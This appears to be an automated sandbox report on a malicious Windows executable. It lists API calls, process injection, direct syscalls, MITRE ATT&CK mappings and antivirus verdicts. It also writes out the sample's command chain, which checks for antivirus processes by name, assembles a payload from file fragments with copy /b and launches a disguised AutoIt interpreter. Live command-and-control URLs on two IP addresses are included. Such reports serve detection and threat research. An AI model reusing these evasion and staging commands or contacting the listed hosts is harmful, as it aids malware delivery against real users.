Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405BBF
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E0C0 HeapAlloc,GetProcessHeap,21_2_0000021925D6E0C0
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4C004 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0000021925D4C004
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E190 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,21_2_0000021925D6E190
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E1B0 SetUnhandledExceptionFilter,21_2_0000021925D6E1B0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D6E1A0 IsDebuggerPresent,SetUnhandledExceptionFilter,21_2_0000021925D6E1A0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C589566C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF6C589566C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5895850 SetUnhandledExceptionFilter,21_2_00007FF6C5895850
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B8E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF6C58B8E74
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58AAD08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF6C58AAD08

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtQuerySystemInformation: Direct from: 0x7FF6C5894924Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtQueryAttributesFile: Direct from: 0x7FF6C58ED642Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtQueryInformationToken: Direct from: 0x7FF6C5903508Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtClose: Direct from: 0x7FF6C58EC3CD
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtProtectVirtualMemory: Direct from: 0x7FF6C58AB26CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtClose: Direct from: 0x7FF6C58EC5C7
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtDelayExecution: Direct from: 0x7FF6C5881C92Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtOpenFile: Direct from: 0x7FF6C58EC37BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtUnmapViewOfSection: Direct from: 0x7FF6C58EC508Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtQuerySystemInformation: Direct from: 0x7FFB2CE826A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtProtectVirtualMemory: Direct from: 0x7FF6C5898FF0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtDelayExecution: Direct from: 0x7FF6C58EDFD8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtQuerySystemInformation: Direct from: 0x7FF6C58EC4ADJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtUnmapViewOfSection: Direct from: 0x7FF6C58EC4BDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifNtProtectVirtualMemory: Direct from: 0x7FF6C58783B5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifMemory written: C:\Users\user\AppData\Local\Temp\473638\Element.pif base: 21925C50000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifThread register set: target process: 6196Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5873B64 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,21_2_00007FF6C5873B64
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5894364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,21_2_00007FF6C5894364
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exitJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 473638Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomCompositionInjection" Participants Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\They + ..\Florence + ..\Astrology + ..\Attributes + ..\Connect + ..\This + ..\Residents + ..\Staff + ..\Net + ..\Funded + ..\Laughing + ..\Reviewing + ..\Bullet + ..\Amendment + ..\Notre + ..\Beside + ..\Hc + ..\Heavily + ..\Spirit + ..\Contribution + ..\Dictionaries + ..\Simply + ..\Infants + ..\Music + ..\Right + ..\Fox + ..\Firewall + ..\Mint QJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\473638\Element.pif Element.pif QJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess created: C:\Users\user\AppData\Local\Temp\473638\Element.pif C:\Users\user~1\AppData\Local\Temp\473638\Element.pifJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\they + ..\florence + ..\astrology + ..\attributes + ..\connect + ..\this + ..\residents + ..\staff + ..\net + ..\funded + ..\laughing + ..\reviewing + ..\bullet + ..\amendment + ..\notre + ..\beside + ..\hc + ..\heavily + ..\spirit + ..\contribution + ..\dictionaries + ..\simply + ..\infants + ..\music + ..\right + ..\fox + ..\firewall + ..\mint q
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\they + ..\florence + ..\astrology + ..\attributes + ..\connect + ..\this + ..\residents + ..\staff + ..\net + ..\funded + ..\laughing + ..\reviewing + ..\bullet + ..\amendment + ..\notre + ..\beside + ..\hc + ..\heavily + ..\spirit + ..\contribution + ..\dictionaries + ..\simply + ..\infants + ..\music + ..\right + ..\fox + ..\firewall + ..\mint qJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58DDB9C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,21_2_00007FF6C58DDB9C
Source: Element.pif, 00000011.00000000.1272060591.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp, Element.pif, 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp, Rick.0.dr, Element.pif.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Element.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58AFBB0 cpuid 21_2_00007FF6C58AFBB0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_0000021925D5E2FC
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_0000021925D5E118
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: EnumSystemLocalesW,21_2_0000021925D5DCE0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: EnumSystemLocalesW,21_2_0000021925D5DC10
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: GetLocaleInfoW,21_2_0000021925D56D38
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,21_2_0000021925D5D8B4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: EnumSystemLocalesW,21_2_0000021925D569A4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CD5AFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_0000021925CD5AFC
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B2290 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,21_2_00007FF6C58B2290
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00405C70 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,0_2_00405C70
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
1
Exploitation for Privilege Escalation
1
Masquerading
11
Input Capture
2
System Time Discovery
Remote Services11
Input Capture
2
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter
Boot or Logon Initialization Scripts212
Process Injection
1
Virtualization/Sandbox Evasion
LSASS Memory41
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)1
Abuse Elevation Control Mechanism
212
Process Injection
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin Shares1
Clipboard Data
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
NTDS4
Process Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials3
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync26
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1510359 Sample: wWk9NkXYcL.exe Startdate: 12/09/2024 Architecture: WINDOWS Score: 100 45 aSrgKXZxBg.aSrgKXZxBg 2->45 57 Suricata IDS alerts for network traffic 2->57 59 Antivirus detection for URL or domain 2->59 61 Antivirus / Scanner detection for submitted sample 2->61 63 3 other signatures 2->63 10 wWk9NkXYcL.exe 39 2->10         started        signatures3 process4 file5 35 C:\Users\user\AppData\Local\Temp\Connect, COM 10->35 dropped 37 C:\Users\user\AppData\Local\Temp\This, data 10->37 dropped 39 C:\Users\user\AppData\Local\Temp\They, data 10->39 dropped 41 25 other malicious files 10->41 dropped 65 Writes many files with high entropy 10->65 14 cmd.exe 2 10->14         started        signatures6 process7 file8 43 C:\Users\user\AppData\Local\...lement.pif, PE32+ 14->43 dropped 67 Drops PE files with a suspicious file extension 14->67 69 Writes many files with high entropy 14->69 18 Element.pif 14->18         started        21 cmd.exe 2 14->21         started        24 conhost.exe 14->24         started        26 7 other processes 14->26 signatures9 process10 file11 51 Modifies the context of a thread in another process (thread injection) 18->51 53 Injects a PE file into a foreign processes 18->53 55 Found direct / indirect Syscall (likely to bypass EDR) 18->55 28 Element.pif 18->28         started        33 C:\Users\user\AppData\Local\Temp\473638\Q, data 21->33 dropped signatures12 process13 dnsIp14 47 195.10.205.48, 49704, 80 TSSCOM-ASRU Russian Federation 28->47 49 193.233.232.86, 49705, 80 FREE-NET-ASFREEnetEU Russian Federation 28->49 31 WerFault.exe 4 28->31         started        process15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
wWk9NkXYcL.exe34%ReversingLabsWin32.Trojan.Generic
wWk9NkXYcL.exe100%AviraTR/AVI.Agent.krnfv
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\473638\Element.pif0%ReversingLabs
C:\Users\user\AppData\Local\Temp\Connect0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
http://193.233.232.86/api/crazyfish.phpdll0%Avira URL Cloudsafe
http://crl.entrust.net/g2ca.crl00%Avira URL Cloudsafe
http://ocsp.entrust.net020%Avira URL Cloudsafe
http://www.entrust.net/rpa030%Avira URL Cloudsafe
https://github.-1/0%Avira URL Cloudsafe
https://github.-10%Avira URL Cloudsafe
https://www.youtube.$0%Avira URL Cloudsafe
http://ocsp.entrust.net000%Avira URL Cloudsafe
http://ocsp.entrust.net010%Avira URL Cloudsafe
https://github.com0%Avira URL Cloudsafe
https://github.co(0%Avira URL Cloudsafe
https://fb.me/%30%Avira URL Cloudsafe
http://www.autoitscript.com/autoit3/X0%Avira URL Cloudsafe
http://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
http://195.10.205.48/:%0%Avira URL Cloudsafe
http://195.10.205.48/api/crazyfish.php100%Avira URL Cloudmalware
http://195.10.205.48/api/crazyfish.php.A0%Avira URL Cloudsafe
https://github.2&0%Avira URL Cloudsafe
https://ipgeolocation.io/0%Avira URL Cloudsafe
https://github.30%Avira URL Cloudsafe
https://github.20%Avira URL Cloudsafe
https://github.2C0%Avira URL Cloudsafe
http://crl.entrust.net/csbr1.crl00%Avira URL Cloudsafe
https://github.co.L0%Avira URL Cloudsafe
https://mdn.io//10%Avira URL Cloudsafe
https://github.-0%Avira URL Cloudsafe
https://ipinfo.io/0%Avira URL Cloudsafe
https://github./0%Avira URL Cloudsafe
https://github.com/0%Avira URL Cloudsafe
https://ipinfo.io/https://ipgeolocation.io/00%Avira URL Cloudsafe
https://github.com40%Avira URL Cloudsafe
http://193.233.232.86/0%Avira URL Cloudsafe
http://193.233.232.86:80/api/crazyfish.php10%Avira URL Cloudsafe
https://github./m0%Avira URL Cloudsafe
http://193.233.232.86/2%0%Avira URL Cloudsafe
http://www.w3.o0%Avira URL Cloudsafe
https://github.c0%Avira URL Cloudsafe
http://www.winimage.com/zLibDll0%Avira URL Cloudsafe
http://aia.entrust.net/evcs2-chain.p7c010%Avira URL Cloudsafe
http://193.233.232.86/api/crazyfish.php100%Avira URL Cloudmalware
http://crl.entrust.net/evcs2.crl00%Avira URL Cloudsafe
http://195.10.205.48/0%Avira URL Cloudsafe
http://www.entrust.net/rpa00%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
aSrgKXZxBg.aSrgKXZxBg
unknown
unknownfalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.entrust.net/g2ca.crl0wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github.-1/wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://193.233.232.86/api/crazyfish.phpdllElement.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://ocsp.entrust.net02wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github.comwWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://ocsp.entrust.net01wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://www.entrust.net/rpa03wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://ocsp.entrust.net00wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://www.youtube.$wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github.-1wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github.co(wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://fb.me/%3wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://www.autoitscript.com/autoit3/XElement.pif, 00000011.00000000.1272166025.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp, Element.pif, 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp, Rick.0.dr, Element.pif.2.drfalse
    • Avira URL Cloud: safe
    unknown
    http://195.10.205.48/:%Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nsis.sf.net/NSIS_ErrorErrorwWk9NkXYcL.exefalse
    • URL Reputation: safe
    unknown
    http://www.autoitscript.com/autoit3/Element.piffalse
    • Avira URL Cloud: safe
    unknown
    https://www.autoitscript.com/autoit3/wWk9NkXYcL.exe, 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Rick.0.dr, Element.pif.2.drfalse
    • Avira URL Cloud: safe
    unknown
    http://195.10.205.48/api/crazyfish.phpElement.pif, 00000015.00000002.2502705369.0000021925E38000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E4E000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    http://195.10.205.48/api/crazyfish.php.AElement.pif, 00000015.00000002.2502705369.0000021925E38000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://github.2&wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://ipgeolocation.io/Element.piffalse
    • Avira URL Cloud: safe
    unknown
    https://github.2wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github.2CwWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github.3wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://crl.entrust.net/csbr1.crl0wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github.co.LwWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github.-wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://mdn.io//1wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github./wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://ipinfo.io/Element.piffalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://ipinfo.io/https://ipgeolocation.io/0Element.pif, 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://193.233.232.86/Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com4wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://193.233.232.86:80/api/crazyfish.php1Element.pif, 00000015.00000002.2502705369.0000021925E61000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://www.w3.owWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://193.233.232.86/2%Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://www.winimage.com/zLibDllElement.pif, 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://github.cwWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    https://github./mwWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://aia.entrust.net/evcs2-chain.p7c01wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://193.233.232.86/api/crazyfish.phpElement.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925EA2000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E8E000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925E78000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    http://crl.entrust.net/evcs2.crl0wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://www.entrust.net/rpa0wWk9NkXYcL.exefalse
    • Avira URL Cloud: safe
    unknown
    http://195.10.205.48/Element.pif, 00000015.00000002.2502705369.0000021925E58000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    193.233.232.86
    unknownRussian Federation
    2895FREE-NET-ASFREEnetEUtrue
    195.10.205.48
    unknownRussian Federation
    35813TSSCOM-ASRUtrue
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1510359
    Start date and time:2024-09-12 21:25:11 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 18s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:29
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:wWk9NkXYcL.exe
    renamed because original name is a hash value
    Original Sample Name:3a1ccc44a0aa6f397c3b2eacf6d4c526.exe
    Detection:MAL
    Classification:mal100.rans.evad.winEXE@25/34@1/2
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 83%
    • Number of executed functions: 27
    • Number of non-executed functions: 245
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: wWk9NkXYcL.exe
    TimeTypeDescription
    15:26:05API Interceptor1x Sleep call for process: wWk9NkXYcL.exe modified
    15:26:08API Interceptor1x Sleep call for process: Element.pif modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    193.233.232.867CTH165fQv.exeGet hashmaliciousLatrodectusBrowse
    • 193.233.232.86/api/twofish.php
    3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
    • 193.233.232.86/api/twofish.php
    195.10.205.48gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
    • 195.10.205.48/api/twofish.php
    kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
    • 195.10.205.48/api/twofish.php
    Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
    • 195.10.205.48/api/twofish.php
    eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
    • 195.10.205.48/api/twofish.php
    iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
    • 195.10.205.48/api/twofish.php
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    TSSCOM-ASRUSecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
    • 195.10.205.253
    gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
    • 195.10.205.48
    kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
    • 195.10.205.48
    Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
    • 195.10.205.48
    eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
    • 195.10.205.48
    iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
    • 195.10.205.48
    ORDERDATASHEET#PO8738763.scr.exeGet hashmaliciousAgentTesla, RedLine, SugarDump, XWormBrowse
    • 195.10.205.94
    RFQ 10046335 PO 4502042346 PR 11148099 411128.exeGet hashmaliciousRedLineBrowse
    • 195.10.205.102
    sWXyzk4Kv3.exeGet hashmaliciousAsyncRATBrowse
    • 195.10.205.90
    SecuriteInfo.com.Win32.TrojanX-gen.9663.10822.exeGet hashmaliciousXmrigBrowse
    • 195.10.205.162
    FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
    • 147.45.44.104
    pdf.jsGet hashmaliciousSmokeLoaderBrowse
    • 147.45.125.198
    09.09.2024p.pdf.jsGet hashmaliciousSmokeLoaderBrowse
    • 147.45.125.198
    file.exeGet hashmaliciousLummaC, VidarBrowse
    • 147.45.126.10
    file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
    • 147.45.126.10
    file.exeGet hashmaliciousVidarBrowse
    • 147.45.126.10
    file.exeGet hashmaliciousLummaC, VidarBrowse
    • 147.45.126.10
    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
    • 147.45.126.10
    file.exeGet hashmaliciousLummaC, VidarBrowse
    • 147.45.126.10
    file.exeGet hashmaliciousLummaC, VidarBrowse
    • 147.45.126.10
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
